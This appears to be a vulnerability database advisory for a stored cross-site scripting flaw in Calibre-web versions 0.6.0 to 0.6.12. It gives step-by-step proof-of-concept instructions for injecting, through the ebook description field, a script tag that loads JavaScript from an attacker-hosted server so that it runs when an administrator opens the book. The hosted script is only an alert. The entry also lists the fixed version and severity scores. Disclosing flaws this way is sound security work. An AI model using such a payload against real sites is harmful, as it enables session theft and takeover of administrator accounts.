WhiteSource Vulnerability Database
Date: October 4, 2021
PoC Details
For demonstration purposes, we will use two users:
1. Alice, a low privileged user.
2. Admin, an administrator user.
Log in to the application as Alice and open any ebook. Click Edit Metadata, then click Save and intercept the request. Observe the “description” parameter: its content is sent inside HTML tags. Inject the payload below immediately after the HTML tag and forward the request. The injected payload is saved in the file's metadata.
Log in to the application as Admin (the victim). Click the ebook available on the dashboard and notice the payload being triggered.
// Injected payload after the description parameter
<p>calibre Quick Start Guide</p><script src=http://192168.0.105:4444/xss.js></script>

// Contents of xss.js file hosted on the attacker’s server:
alert("XSS");
Affected Environments
Calibre-web versions v0.6.0 to v0.6.12

Prevention
Update to Calibre-web version 0.6.13
Good to know:
|Attack Vector (AV):|Network|
|Attack Complexity (AC):|Low|
|Privileges Required (PR):|Low|
|User Interaction (UI):|Required|
|Access Vector (AV):|Network|
|Access Complexity (AC):|Medium|